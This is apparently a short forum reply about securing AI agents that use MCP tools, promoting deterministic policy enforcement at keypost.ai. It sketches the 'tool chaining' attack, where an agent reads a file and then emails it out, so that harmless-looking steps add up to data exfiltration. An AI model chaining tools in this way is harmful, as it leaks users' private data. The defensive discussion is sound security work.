This is the exact problem we're seeing with MCP adoption too - powerful tool access with zero restrictions by default.

The "tool chaining" attack class is particularly nasty because each individual action looks benign. Read file? Fine. Send email? Fine. But the combination is exfiltration.

We're working on deterministic policy enforcement for agent pipelines at keypost.ai - the idea is you define what tools can do (not just whether they can be called), so "email tool can only send to @company.com" becomes a hard boundary the agent can't reason around.

The tricky part is making policies that are specific enough to block attacks but general enough to not break legitimate workflows. Curious what patterns you found that would be hardest to catch with simple allow/deny rules?